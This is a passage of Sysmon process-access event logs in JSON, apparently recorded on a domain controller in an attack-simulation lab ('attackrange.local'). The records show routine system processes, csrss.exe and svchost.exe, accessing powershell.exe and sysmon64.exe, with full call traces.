(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5135,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5136,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5137,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5138,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5139,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5140,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windo